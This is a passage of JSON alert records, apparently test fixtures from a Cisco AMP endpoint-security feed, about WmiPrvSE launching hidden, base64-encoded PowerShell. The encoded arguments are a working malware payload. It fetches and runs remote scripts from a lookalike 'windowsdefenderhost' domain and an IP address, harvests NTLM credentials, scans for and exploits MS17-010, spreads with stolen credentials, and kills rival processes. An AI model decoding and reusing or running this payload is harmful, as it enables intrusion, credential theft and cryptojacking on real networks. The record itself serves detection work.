AByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG